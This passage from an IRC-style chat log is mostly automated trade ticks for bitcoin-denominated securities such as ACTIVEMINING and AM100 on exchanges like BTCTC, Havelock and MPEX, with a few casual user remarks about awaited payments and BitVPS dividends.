BTC [+] Jul 29 06:34:14 [BTCTC] [ACTIVEMINING] 124 @ 0.0088 = 1.0912 BTC [+] Jul 29 06:35:55 [BTCTC] [ACTIVEMINING] 126 @ 0.0088 = 1.1088 BTC [+] Jul 29 06:37:31 [HAVELOCK] [AM100] 8 @ 0.04285 = 0.3428 BTC [-] Jul 29 06:37:33 [HAVELOCK] [AM100] 178 @ 0.04281 = 7.6202 BTC [-] Jul 29 06:37:35 [HAVELOCK] [AM100] 62 @ 0.04280002 = 2.6536 BTC [-] Jul 29 06:37:37 [HAVELOCK] [AM100] 1 @ 0.0428 BTC [-] Jul 29 06:37:39 [HAVELOCK] [AM100] 5 @ 0.0427 = 0.2135 BTC [-] Jul 29 06:37:41 [HAVELOCK] [AM100] 55 @ 0.04252 = 2.3386 BTC [-] Jul 29 06:37:43 [HAVELOCK] [AM100] 5 @ 0.0425 = 0.2125 BTC [-] Jul 29 06:37:45 [HAVELOCK] [AM100] 10 @ 0.04240032 = 0.424 BTC [-] Jul 29 06:37:48 [HAVELOCK] [AM100] 3 @ 0.04231 = 0.1269 BTC [-] Jul 29 06:37:50 [HAVELOCK] [AM100] 5 @ 0.0423 = 0.2115 BTC [-] Jul 29 06:37:52 [HAVELOCK] [AM100] 25 @ 0.04222 = 1.0555 BTC [-] Jul 29 06:37:54 [HAVELOCK] [AM100] 1 @ 0.04220111 BTC [-] Jul 29 06:37:55 [HAVELOCK] [AM100] 5 @ 0.0421 = 0.2105 BTC [-] Jul 29 06:37:57 [HAVELOCK] [AM100] 437 @ 0.042 = 18.354 BTC [-] Jul 29 06:38:00 [BTCTC] [ACTIVEMINING] 4 @ 0.008712 = 0.0348 BTC [-] Jul 29 06:38:01 [BTCTC] [ACTIVEMINING] 50 @ 0.008711 = 0.4356 BTC [-] Jul 29 06:39:39 [BTCTC] [ACTIVEMINING] 22 @ 0.0087 = 0.1914 BTC [-] Jul 29 06:40:19 [BTCTC] [ACTIVEMINING] 30 @ 0.0087 = 0.261 BTC [-] Jul 29 06:41:00 [HAVELOCK] [HIM] 5 @ 0.187 = 0.935 BTC [-] Jul 29 06:41:03 [HAVELOCK] [AM100] 4 @ 0.0429499 = 0.1718 BTC [+] Jul 29 06:41:44 [HAVELOCK] [SMG] 7 @ 0.00026997 = 0.0019 BTC [+] Jul 29 06:42:03 [HAVELOCK] [SMG] 3200 @ 0.00026998 = 0.8639 BTC [+] Jul 29 06:43:01 [HAVELOCK] [SMG] 275 @ 0.00027 = 0.0743 BTC [+] Jul 29 06:43:56 [BTCTC] [TAT.ASICMINER] 50 @ 0.0425 = 2.125 BTC [-] Jul 29 06:45:01 [BTCTC] [ACTIVEMINING] 2 @ 0.008789 = 0.0176 BTC [+] Jul 29 06:45:26 [BTCTC] [ACTIVEMINING] 326 @ 0.0087 = 2.8362 BTC [-] Jul 29 06:45:31 [BTCTC] [ACTIVEMINING] 199 @ 0.008789 = 1.749 BTC [+] Jul 29 06:45:39 [BTCTC] [ACTIVEMINING] 25 @ 0.008788 = 0.2197 BTC [-] Jul 29 06:46:05 [BTCTC] [ACTIVEMINING] 16 @ 0.008789 = 0.1406 BTC [+] Jul 29 06:46:18 [BTCTC] [ACTIVEMINING] 500 @ 0.008652 = 4.326 BTC [-] Jul 29 06:46:29 [BTCTC] [ACTIVEMINING] 25 @ 0.008503 = 0.2126 BTC [-] Jul 29 06:46:32 [BTCTC] [ACTIVEMINING] 25 @ 0.008502 = 0.2126 BTC [-] Jul 29 06:46:34 [BTCTC] [ACTIVEMINING] 500 @ 0.0085 = 4.25 BTC [-] Jul 29 06:47:27 [BTCTC] [ASICMINER-PT] 1 @ 4.291 BTC [+] Jul 29 06:48:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.04249 = 0.085 BTC [-] Jul 29 06:48:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.0425 = 0.2125 BTC [+] Jul 29 06:49:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.0425 = 0.1275 BTC [+] Jul 29 06:49:48 [BTCTC] [TAT.ASICMINER] 49 @ 0.0425 = 2.0825 BTC [+] Jul 29 06:49:50 [BTCTC] [TAT.ASICMINER] 31 @ 0.04235 = 1.3129 BTC [-] Jul 29 06:49:59 [BTCTC] [TAT.MINIGAME] 690 @ 0.000295 = 0.2036 BTC [+] Jul 29 06:51:12 [BTCTC] [ASICMINER-PT] 1 @ 4.295 BTC [+] Jul 29 06:51:49 [BTCTC] [TAT.MINIGAME] 10 @ 0.000295 = 0.003 BTC [+] Jul 29 06:55:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.04234 = 0.254 BTC [-] Jul 29 06:55:45 [BTCTC] [TAT.ASICMINER] 24 @ 0.04235 = 1.0164 BTC [+] Jul 29 06:56:06 [HAVELOCK] [AM1] 1 @ 4.32 BTC [-] Jul 29 06:56:44 [BTCTC] [ACTIVEMINING] 50 @ 0.008351 = 0.4176 BTC [-] Jul 29 06:56:46 [BTCTC] [ACTIVEMINING] 8 @ 0.00835 = 0.0668 BTC [-] Jul 29 06:56:46 [BTCTC] [ACTIVEMINING] 100 @ 0.00834 = 0.834 BTC [-] Jul 29 06:57:01 [BTCTC] [ACTIVEMINING] 25 @ 0.0083 = 0.2075 BTC [-] Jul 29 06:57:04 [BTCTC] [ACTIVEMINING] 3042 @ 0.0082 = 24.9444 BTC [-] Jul 29 06:57:08 [BTCTC] [ACTIVEMINING] 158 @ 0.0082 = 1.2956 BTC [-] Jul 29 07:02:36 [BTCTC] [S.MPOE-PT] 10 @ 0.0009457 = 0.0095 BTC [+] Jul 29 07:04:04 [BTCTC] [TAT.ASICMINER] 25 @ 0.0429 = 1.0725 BTC [+] Jul 29 07:05:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.04299 = 0.4299 BTC [+] Jul 29 07:07:10 [BTCTC] [ACTIVEMINING] 80 @ 0.008012 = 0.641 BTC [-] Jul 29 07:07:12 [BTCTC] [ACTIVEMINING] 100 @ 0.008003 = 0.8003 BTC [-] Jul 29 07:07:14 [BTCTC] [ACTIVEMINING] 1000 @ 0.008002 = 8.002 BTC [-] Jul 29 07:07:17 [BTCTC] [ACTIVEMINING] 100 @ 0.0088 = 0.88 BTC [+] Jul 29 07:07:21 [BTCTC] [ACTIVEMINING] 10 @ 0.008 = 0.08 BTC [-] Jul 29 07:07:35 [HAVELOCK] [SMG] 1 @ 0.00027 BTC [+] Jul 29 07:08:57 [BTCTC] [BFMINES] 100 @ 0.004 = 0.4 BTC [+] Jul 29 07:09:38 [HAVELOCK] [AM100] 5 @ 0.04200001 = 0.21 BTC [-] Jul 29 07:09:48 [HAVELOCK] [AM100] 63 @ 0.042 = 2.646 BTC [-] Jul 29 07:09:53 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [-] Jul 29 07:10:00 [HAVELOCK] [AM100] 10 @ 0.0419 = 0.419 BTC [-] Jul 29 07:10:05 [HAVELOCK] [AM100] 26 @ 0.0415 = 1.079 BTC [-] Jul 29 07:10:53 [HAVELOCK] [AM100] 2 @ 0.041 = 0.082 BTC [-] Jul 29 07:12:14 [BTCTC] [TAT.ASICMINER] 26 @ 0.04298 = 1.1175 BTC [-] Jul 29 07:12:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.04298 = 0.086 BTC [-] Jul 29 07:17:21 [BTCTC] [ACTIVEMINING] 75 @ 0.007878 = 0.5909 BTC [-] Jul 29 07:17:23 [BTCTC] [ACTIVEMINING] 75 @ 0.007877 = 0.5908 BTC [-] Jul 29 07:17:38 [BTCTC] [ACTIVEMINING] 75 @ 0.007877 = 0.5908 BTC [-] Jul 29 07:18:28 [BTCTC] [ACTIVEMINING] 75 @ 0.007301 = 0.5476 BTC [-] Jul 29 07:18:30 [BTCTC] [ACTIVEMINING] 150 @ 0.0073 = 1.095 BTC [-] Jul 29 07:18:32 [BTCTC] [ACTIVEMINING] 175 @ 0.007101 = 1.2427 BTC [-] Jul 29 07:18:34 [BTCTC] [ACTIVEMINING] 277 @ 0.0071 = 1.9667 BTC [-] Jul 29 07:18:50 [BTCTC] [ACTIVEMINING] 25 @ 0.007302 = 0.1826 BTC [+] Jul 29 07:18:52 [BTCTC] [KENILWORTH] 1 @ 0.001714 BTC [-] Jul 29 07:19:05 [BTCTC] [TAT.ASICMINER] 19 @ 0.04251 = 0.8077 BTC [-] Jul 29 07:19:18 [BTCTC] [ACTIVEMINING] 25 @ 0.007103 = 0.1776 BTC [-] Jul 29 07:19:20 [BTCTC] [ACTIVEMINING] 562 @ 0.007102 = 3.9913 BTC [-] Jul 29 07:19:40 [BTCTC] [ACTIVEMINING] 73 @ 0.0071 = 0.5183 BTC [-] Jul 29 07:19:42 [BTCTC] [ACTIVEMINING] 55 @ 0.00709 = 0.39 BTC [-] Jul 29 07:19:45 [BTCTC] [ACTIVEMINING] 15 @ 0.007021 = 0.1053 BTC [-] Jul 29 07:19:47 [BTCTC] [ACTIVEMINING] 30 @ 0.00702 = 0.2106 BTC [-] Jul 29 07:19:48 [BTCTC] [ACTIVEMINING] 65 @ 0.007001 = 0.4551 BTC [-] Jul 29 07:19:50 [BTCTC] [ACTIVEMINING] 5 @ 0.007 = 0.035 BTC [-] Jul 29 07:19:52 [BTCTC] [ACTIVEMINING] 100 @ 0.007 = 0.7 BTC [-] Jul 29 07:19:54 [BTCTC] [ACTIVEMINING] 570 @ 0.006876 = 3.9193 BTC [-] Jul 29 07:19:56 [BTCTC] [ACTIVEMINING] 200 @ 0.006875 = 1.375 BTC [-] Jul 29 07:19:58 [BTCTC] [ACTIVEMINING] 460 @ 0.006875 = 3.1625 BTC [-] Jul 29 07:19:59 [BTCTC] [ACTIVEMINING] 1427 @ 0.006874 = 9.8092 BTC [-] Jul 29 07:20:25 [BTCTC] [ACTIVEMINING] 25 @ 0.007002 = 0.1751 BTC [+] Jul 29 07:20:27 [BTCTC] [ACTIVEMINING] 305 @ 0.007 = 2.135 BTC [-] Jul 29 07:21:24 [BTCTC] [ACTIVEMINING] 45 @ 0.007001 = 0.315 BTC [+] Jul 29 07:22:12 [BTCTC] [S.MPOE-PT] 75 @ 0.0008358 = 0.0627 BTC [-] Jul 29 07:22:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.04299 = 0.086 BTC [+] Jul 29 07:22:54 [BTCTC] [KENILWORTH] 4 @ 0.001713 = 0.0069 BTC [-] Jul 29 07:22:57 [BTCTC] [TAT.MINIGAME] 1 @ 0.000281 BTC [-] Jul 29 07:23:13 [BTCTC] [ACTIVEMINING] 5 @ 0.007001 = 0.035 BTC [+] Jul 29 07:23:25 [BTCTC] [ACTIVEMINING] 52 @ 0.007096 = 0.369 BTC [+] Jul 29 07:23:34 [BTCTC] [ACTIVEMINING] 750 @ 0.007005 = 5.2538 BTC [-] Jul 29 07:23:36 [BTCTC] [ACTIVEMINING] 4 @ 0.007001 = 0.028 BTC [-] Jul 29 07:23:38 [BTCTC] [ACTIVEMINING] 1146 @ 0.007 = 8.022 BTC [-] Jul 29 07:23:39 [BTCTC] [ACTIVEMINING] 30 @ 0.007096 = 0.2129 BTC [+] Jul 29 07:23:57 [BTCTC] [ACTIVEMINING] 25 @ 0.007095 = 0.1774 BTC [-] Jul 29 07:23:59 [BTCTC] [ACTIVEMINING] 75 @ 0.007096 = 0.5322 BTC [+] Jul 29 07:24:00 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00312 = 0.0281 BTC [-] Jul 29 07:24:02 [BTCTC] [ACTIVEMINING] 300 @ 0.007 = 2.1 BTC [-] Jul 29 07:24:04 [BTCTC] [TAT.VIRTUALMINE] 228 @ 0.003119 = 0.7111 BTC [-] Jul 29 07:24:06 [BTCTC] [TAT.MINIGAME] 115 @ 0.000295 = 0.0339 BTC [+] Jul 29 07:24:07 [BTCTC] [ACTIVEMINING] 405 @ 0.007096 = 2.8739 BTC [+] Jul 29 07:24:13 [BTCTC] [TAT.VIRTUALMINE] 170 @ 0.003118 = 0.5301 BTC [-] Jul 29 07:33:32 [MPEX] [S.MPOE] 24563 @ 0.00081377 = 19.9886 BTC [-] Jul 29 07:34:25 [BTCTC] [ACTIVEMINING] 20 @ 0.007099 = 0.142 BTC [+] Jul 29 07:34:47 [BTCTC] [ACTIVEMINING] 1 @ 0.007098 BTC [-] Jul 29 07:34:56 [BTCTC] [ACTIVEMINING] 20 @ 0.0071 = 0.142 BTC [+] Jul 29 07:35:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.04251 = 0.085 BTC [-] Jul 29 07:35:54 [BTCTC] [TAT.MINIGAME] 1 @ 0.000294 BTC [-] Jul 29 07:35:56 [BTCTC] [TAT.ASICMINER] 42 @ 0.0425 = 1.785 BTC [-] Jul 29 07:35:57 [BTCTC] [TAT.MINIGAME] 4185 @ 0.000295 = 1.2346 BTC [+] Jul 29 07:35:59 [BTCTC] [TAT.MINIGAME] 650 @ 0.000295 = 0.1918 BTC [+] Jul 29 07:36:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 29 07:36:03 [BTCTC] [TAT.MINIGAME] 2164 @ 0.0003 = 0.6492 BTC [+] Jul 29 07:38:42 [BTCTC] [ACTIVEMINING] 200 @ 0.0075 = 1.5 BTC [+] Jul 29 07:38:58 [BTCTC] [ACTIVEMINING] 25 @ 0.007499 = 0.1875 BTC [-] Jul 29 07:39:00 [BTCTC] [ACTIVEMINING] 295 @ 0.0075 = 2.2125 BTC [+] Jul 29 07:39:02 [BTCTC] [ACTIVEMINING] 1505 @ 0.0075 = 11.2875 BTC [+] Jul 29 07:39:28 [BTCTC] [ACTIVEMINING] 125 @ 0.0075 = 0.9375 BTC [+] Jul 29 07:40:45 [BTCTC] [ACTIVEMINING] 25 @ 0.007998 = 0.2 BTC [+] Jul 29 07:40:48 [BTCTC] [DMS.SELLING] 1 @ 0.0201 BTC [-] Jul 29 07:40:49 [BTCTC] [ACTIVEMINING] 196 @ 0.007999 = 1.5678 BTC [+] Jul 29 07:40:51 [BTCTC] [ACTIVEMINING] 1180 @ 0.008 = 9.44 BTC [+] Jul 29 07:40:52 [BTCTC] [DMS.SELLING] 20 @ 0.0201 = 0.402 BTC [-] Jul 29 07:40:53 [BTCTC] [ACTIVEMINING] 1350 @ 0.0085 = 11.475 BTC [+] Jul 29 07:40:55 [BTCTC] [ACTIVEMINING] 1000 @ 0.00878 = 8.78 BTC [+] Jul 29 07:40:58 [BTCTC] [ACTIVEMINING] 80 @ 0.008799 = 0.7039 BTC [+] Jul 29 07:41:00 [BTCTC] [ACTIVEMINING] 1150 @ 0.0088 = 10.12 BTC [+] Jul 29 07:41:01 [BTCTC] [ACTIVEMINING] 1 @ 0.008854 BTC [+] Jul 29 07:41:01 [BTCTC] [ACTIVEMINING] 1000 @ 0.008888 = 8.888 BTC [+] Jul 29 07:41:03 [BTCTC] [ACTIVEMINING] 1000 @ 0.009 = 9 BTC [+] Jul 29 07:43:40 [BTCTC] [ACTIVEMINING] 1018 @ 0.009 = 9.162 BTC [+] Jul 29 07:44:57 Fuck, where's DeaDTerra... that lazy bum. I'm waiting for my monies. Jul 29 07:45:16 [BTCTC] [ACTIVEMINING] 4 @ 0.008998 = 0.036 BTC [-] Jul 29 07:45:23 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 29 07:45:24 [BTCTC] [GSDPT] 52 @ 0.00348 = 0.181 BTC [+] Jul 29 07:46:08 He probably came back and just said "Fuck it, I'll do it tomorrow." Jul 29 07:46:26 [BTCTC] [ACTIVEMINING] 46 @ 0.008997 = 0.4139 BTC [-] Jul 29 07:46:27 Would be nice if he was around chat a bit more. Jul 29 07:46:32 Namworld: when does July get released? Jul 29 07:46:36 for Bitvps? Jul 29 07:47:09 [BTCTC] [ACTIVEMINING] 4 @ 0.00899 = 0.036 BTC [-] Jul 29 07:47:10 No clue. Whenever the statements are completed. Jul 29 07:47:34 I feel like the stock is gonna skyrocket if dividends are paid Jul 29 07:48:15 [BTCTC] [BASIC-MINING] 1 @ 0.5369 BTC [-] Jul 29 07:49:26 [BTCTC] [ACTIVEMINING] 5 @ 0.008798 = 0.044 BTC [-] Jul 29 07:49:52 [BTCTC] [ACTIVEMINING] 2 @ 0.007651 = 0.0153 BTC [-] Jul 29 07:50:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.04293 = 0.0859 BTC [+] Jul 29 07:51:54 [BTCTC] [ACTIVEMINING] 25 @ 0.008223 = 0.2056 BTC [+] Jul 29 07:51:56 [BTCTC] [ACTIVEMINING] 1250 @ 0.008222 = 10.2775 BTC [-] Jul 29 07:52:05 [BTCTC] [ACTIVEMINING] 20 @ 0.008222 = 0.1644 BTC [-] Jul 29 07:52:42 [BTCTC] [ACTIVEMINING] 25 @ 0.008221 = 0.2055 BTC [-] Jul 29 07:56:22 I'd be somewhat surprised. But anyway. Jul 29 07:58:22 [MPEX] [S.MPOE] 3750 @ 0.00081036 = 3.0389 BTC [-] Jul 29 07:59:43 [BTCTC] [GSDPT] 4 @ 0.003354 = 0.0134 BTC [-] Jul 29 08:02:00 [BTCTC] [ACTIVEMINING] 64 @ 0.00845 = 0.5408 BTC [+] Jul 29 08:02:22 [BTCTC] [ACTIVEMINING] 400 @ 0.00845 = 3.38 BTC [+] Jul 29 08:02:58 [BTCTC] [ACTIVEMINING] 4 @ 0.008449 = 0.0338 BTC [-] Jul 29 08:03:00 [BTCTC] [ACTIVEMINING] 233 @ 0.00845 = 1.9689 BTC [+] Jul 29 08:03:14 I mean, BitVPS is doing great as seen in previous statements. But it's still USD profits and growing slow. Jul 29 08:03:17 [BTCTC] [ACTIVEMINING] 3 @ 0.00845 = 0.0254 BTC [+] Jul 29 08:03:55 [BTCTC] [ACTIVEMINING] 108 @ 0.008499 = 0.9179 BTC [+] Jul 29 08:04:16 [BTCTC] [ACTIVEMINING] 20 @ 0.0085 = 0.17 BTC [+] Jul 29 08:04:18 [BTCTC] [ACTIVEMINING] 630 @ 0.0085 = 5.355 BTC [+] Jul 29 08:04:34 [BTCTC] [ACTIVEMINING] 8 @ 0.008501 = 0.068 BTC [+] Jul 29 08:04:52 [BTCTC] [ACTIVEMINING] 50 @ 0.0085 = 0.425 BTC [-] Jul 29 08:05:06 [BTCTC] [TAT.ASICMINER] 61 @ 0.04234 = 2.5827 BTC [-] Jul 29 08:05:24 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003118 = 0.0935 BTC [-] Jul 29 08:05:39 [BTCTC] [TAT.MINIGAME] 200 @ 0.0003 = 0.06 BTC [+] Jul 29 08:05:47 [BTCTC] [ACTIVEMINING] 81 @ 0.008849 = 0.7168 BTC [+] Jul 29 08:06:21 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jul 29 08:08:06 [BTCTC] [ACTIVEMINING] 25 @ 0.008799 = 0.22 BTC [-] Jul 29 08:08:08 [BTCTC] [ACTIVEMINING] 175 @ 0.0088 = 1.54 BTC [+] Jul 29 08:08:21 [BTCTC] [ACTIVEMINING] 100 @ 0.0087 = 0.87 BTC [-] Jul 29 08:08:23 [BTCTC] [ACTIVEMINING] 25 @ 0.0088 = 0.22 BTC [+] Jul 29 08:08:24 [BTCTC] [ACTIVEMINING] 215 @ 0.00887 = 1.9071 BTC [+] Jul 29 08:09:06 [BTCTC] [ACTIVEMINING] 79 @ 0.00887 = 0.7007 BTC [+] Jul 29 08:09:16 [BTCTC] [ACTIVEMINING] 8 @ 0.00887 = 0.071 BTC [+] Jul 29 08:09:28 [BTCTC] [ACTIVEMINING] 125 @ 0.0088 = 1.1 BTC [-] Jul 29 08:09:48 [BTCTC] [ACTIVEMINING] 6 @ 0.00887 = 0.0532 BTC [+] Jul 29 08:11:52 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Jul 29 08:12:14 [BTCTC] [ACTIVEMINING] 10 @ 0.008101 = 0.081 BTC [-] Jul 29 08:12:18 [BTCTC] [ACTIVEMINING] 1 @ 0.00887 BTC [+] Jul 29 08:16:30 [BTCTC] [ACTIVEMINING] 25 @ 0.008109 = 0.2027 BTC [-] Jul 29 08:16:32 [BTCTC] [ACTIVEMINING] 5 @ 0.008108 = 0.0405 BTC [-] Jul 29 08:16:32 [BTCTC] [ACTIVEMINING] 50 @ 0.008105 = 0.4053 BTC [-] Jul 29 08:16:57 [BTCTC] [ACTIVEMINING] 20 @ 0.008746 = 0.1749 BTC [+] Jul 29 08:17:57 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003118 = 0.1559 BTC [-] Jul 29 08:18:20 [BTCTC] [TAT.VIRTUALMINE] 460 @ 0.003001 = 1.3805 BTC [-] Jul 29 08:19:58 [BTCTC] [ACTIVEMINING] 1 @ 0.0082 BTC [-] Jul 29 08:20:22 [BTCTC] [ACTIVEMINING] 25 @ 0.008349 = 0.2087 BTC [+] Jul 29 08:20:24 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003 = 0.006 BTC [-] Jul 29 08:20:25 [BTCTC] [ACTIVEMINING] 26 @ 0.00835 = 0.2171 BTC [+] Jul 29 08:20:28 [BTCTC] [TAT.VIRTUALMINE] 210 @ 0.002964 = 0.6224 BTC [-] Jul 29 08:20:31 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00292 BTC [-] Jul 29 08:20:33 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002904 = 0.0145 BTC [-] Jul 29 08:20:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0029 BTC [-] Jul 29 08:20:36 [BTCTC] [ACTIVEMINING] 74 @ 0.00835 = 0.6179 BTC [+] Jul 29 08:20:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0029 BTC [-] Jul 29 08:20:41 [BTCTC] [ACTIVEMINING] 50 @ 0.008398 = 0.4199 BTC [+] Jul 29 08:20:48 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0029 = 0.058 BTC [-] Jul 29 08:20:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0029 BTC [-] Jul 29 08:20:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0029 BTC [-] Jul 29 08:20:54 [BTCTC] [TAT.VIRTUALMINE] 113 @ 0.002871 = 0.3244 BTC [-] Jul 29 08:21:39 [BTCTC] [ACTIVEMINING] 8 @ 0.008398 = 0.0672 BTC [+] Jul 29 08:21:50 [BTCTC] [ACTIVEMINING] 10 @ 0.00835 = 0.0835 BTC [-] Jul 29 08:22:15 [BTCTC] [ACTIVEMINING] 42 @ 0.008398 = 0.3527 BTC [+] Jul 29 08:22:16 [BTCTC] [ACTIVEMINING] 1 @ 0.0084 BTC [+] Jul 29 08:22:18 [BTCTC] [ACTIVEMINING] 1 @ 0.0086 BTC [+] Jul 29 08:22:21 [BTCTC] [ACTIVEMINING] 6 @ 0.00835 = 0.0501 BTC [-] Jul 29 08:23:19 https://forums.eveonline.com/default.aspx?g=posts&t=235836&p=2 Jul 29 08:23:25 Cyno/Covert Cyno - EVE General Discussion - EVE Online Forums Jul 29 08:23:28 best thread ever. this guy should be a bitcoin investor. Jul 29 08:23:28 [BTCTC] [ACTIVEMINING] 10 @ 0.008353 = 0.0835 BTC [+] Jul 29 08:24:14 [BTCTC] [ACTIVEMINING] 10 @ 0.008355 = 0.0836 BTC [+] Jul 29 08:26:53 [BTCTC] [ACTIVEMINING] 25 @ 0.008699 = 0.2175 BTC [+] Jul 29 08:26:58 [BTCTC] [ACTIVEMINING] 23 @ 0.008699 = 0.2001 BTC [+] Jul 29 08:27:00 [BTCTC] [ACTIVEMINING] 43 @ 0.00836 = 0.3595 BTC [-] Jul 29 08:27:02 [BTCTC] [ACTIVEMINING] 21 @ 0.008358 = 0.1755 BTC [-] Jul 29 08:27:04 [BTCTC] [ACTIVEMINING] 40 @ 0.008355 = 0.3342 BTC [-] Jul 29 08:28:34 [BTCTC] [ASICMINER-PT] 1 @ 4.399 BTC [-] Jul 29 08:28:45 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [+] Jul 29 08:30:29 [BTCTC] [ACTIVEMINING] 50 @ 0.008699 = 0.435 BTC [+] Jul 29 08:30:32 [BTCTC] [ACTIVEMINING] 80 @ 0.00868 = 0.6944 BTC [-] Jul 29 08:30:36 [BTCTC] [ACTIVEMINING] 100 @ 0.0087 = 0.87 BTC [+] Jul 29 08:30:39 [BTCTC] [ACTIVEMINING] 325 @ 0.008739 = 2.8402 BTC [+] Jul 29 08:30:43 [BTCTC] [ACTIVEMINING] 350 @ 0.00874 = 3.059 BTC [+] Jul 29 08:30:52 [BTCTC] [ACTIVEMINING] 95 @ 0.0088 = 0.836 BTC [+] Jul 29 08:31:06 [BTCTC] [ACTIVEMINING] 2 @ 0.008112 = 0.0162 BTC [-] Jul 29 08:31:23 [BTCTC] [ACTIVEMINING] 1 @ 0.00831 BTC [+] Jul 29 08:31:24 [BTCTC] [TAT.MINIGAME] 636 @ 0.0003 = 0.1908 BTC [+] Jul 29 08:31:27 [BTCTC] [TAT.MINIGAME] 22 @ 0.0003 = 0.0066 BTC [+] Jul 29 08:31:29 [BTCTC] [TAT.MINIGAME] 20 @ 0.0003069 = 0.0061 BTC [+] Jul 29 08:31:30 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0003069 = 0.3069 BTC [+] Jul 29 08:31:32 [BTCTC] [TAT.MINIGAME] 2322 @ 0.0003075 = 0.714 BTC [+] Jul 29 08:31:33 [BTCTC] [ACTIVEMINING] 2 @ 0.00831 = 0.0166 BTC [+] Jul 29 08:31:38 [BTCTC] [ACTIVEMINING] 7 @ 0.00831 = 0.0582 BTC [+] Jul 29 08:32:21 [BTCTC] [ACTIVEMINING] 6 @ 0.0087 = 0.0522 BTC [+] Jul 29 08:32:23 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 29 08:32:25 [BTCTC] [ACTIVEMINING] 2 @ 0.0087 = 0.0174 BTC [+] Jul 29 08:32:27 [BTCTC] [ACTIVEMINING] 30 @ 0.00875 = 0.2625 BTC [+] Jul 29 08:32:29 [BTCTC] [ACTIVEMINING] 200 @ 0.008787 = 1.7574 BTC [+] Jul 29 08:32:31 [BTCTC] [ACTIVEMINING] 100 @ 0.008799 = 0.8799 BTC [+] Jul 29 08:32:33 [BTCTC] [ACTIVEMINING] 405 @ 0.0088 = 3.564 BTC [+] Jul 29 08:32:34 [BTCTC] [ACTIVEMINING] 257 @ 0.00885 = 2.2745 BTC [+] Jul 29 08:34:18 [BTCTC] [ACTIVEMINING] 10 @ 0.008315 = 0.0832 BTC [-] Jul 29 08:34:49 [BTCTC] [ACTIVEMINING] 25 @ 0.008316 = 0.2079 BTC [+] Jul 29 08:34:51 [BTCTC] [ACTIVEMINING] 75 @ 0.008315 = 0.6236 BTC [-] Jul 29 08:35:39 [MPEX] [S.MPOE] 8676 @ 0.00081377 = 7.0603 BTC [+] Jul 29 08:35:40 [BTCTC] [ACTIVEMINING] 25 @ 0.008316 = 0.2079 BTC [+] Jul 29 08:35:42 [BTCTC] [ACTIVEMINING] 20 @ 0.008315 = 0.1663 BTC [-] Jul 29 08:35:45 [BTCTC] [ACTIVEMINING] 50 @ 0.008314 = 0.4157 BTC [-] Jul 29 08:35:48 [BTCTC] [ACTIVEMINING] 5 @ 0.008312 = 0.0416 BTC [-] Jul 29 08:36:21 [BTCTC] [ACTIVEMINING] 21 @ 0.008313 = 0.1746 BTC [+] Jul 29 08:36:44 [BTCTC] [ACTIVEMINING] 13 @ 0.008312 = 0.1081 BTC [-] Jul 29 08:36:46 [BTCTC] [ACTIVEMINING] 8 @ 0.008312 = 0.0665 BTC [-] Jul 29 08:40:44 [BTCTC] [ACTIVEMINING] 1 @ 0.008687 BTC [+] Jul 29 08:42:21 [BTCTC] [ACTIVEMINING] 3 @ 0.008685 = 0.0261 BTC [-] Jul 29 08:43:30 [BTCTC] [ACTIVEMINING] 25 @ 0.008301 = 0.2075 BTC [-] Jul 29 08:43:32 [BTCTC] [ACTIVEMINING] 590 @ 0.0083 = 4.897 BTC [-] Jul 29 08:43:34 [BTCTC] [ACTIVEMINING] 21 @ 0.008203 = 0.1723 BTC [-] Jul 29 08:43:36 [BTCTC] [ACTIVEMINING] 264 @ 0.008202 = 2.1653 BTC [-] Jul 29 08:45:17 [BTCTC] [ACTIVEMINING] 25 @ 0.008501 = 0.2125 BTC [+] Jul 29 08:45:21 [BTCTC] [ACTIVEMINING] 192 @ 0.008501 = 1.6322 BTC [+] Jul 29 08:45:36 [BTCTC] [ACTIVEMINING] 96 @ 0.008501 = 0.8161 BTC [+] Jul 29 08:45:39 [BTCTC] [ACTIVEMINING] 699 @ 0.0085 = 5.9415 BTC [-] Jul 29 08:46:32 [BTCTC] [ACTIVEMINING] 1 @ 0.008681 BTC [+] Jul 29 08:48:22 [BTCTC] [ACTIVEMINING] 50 @ 0.008204 = 0.4102 BTC [-] Jul 29 08:48:23 [BTCTC] [ACTIVEMINING] 250 @ 0.008204 = 2.051 BTC [-] Jul 29 08:49:18 [BTCTC] [GSDPT] 2 @ 0.003353 = 0.0067 BTC [-] Jul 29 08:51:50 [BTCTC] [ACTIVEMINING] 1 @ 0.008499 BTC [+] Jul 29 08:53:10 [BTCTC] [ACTIVEMINING] 25 @ 0.008497 = 0.2124 BTC [-] Jul 29 08:53:12 [BTCTC] [ACTIVEMINING] 7 @ 0.008498 = 0.0595 BTC [+] Jul 29 08:53:33 [MPEX] [S.MPOE] 7361 @ 0.00081377 = 5.9902 BTC [+] Jul 29 08:53:35 [MPEX] [S.MPOE] 2753 @ 0.00081528 = 2.2445 BTC [+] Jul 29 08:55:22 [BTCTC] [ACTIVEMINING] 50 @ 0.008208 = 0.4104 BTC [-] Jul 29 08:55:24 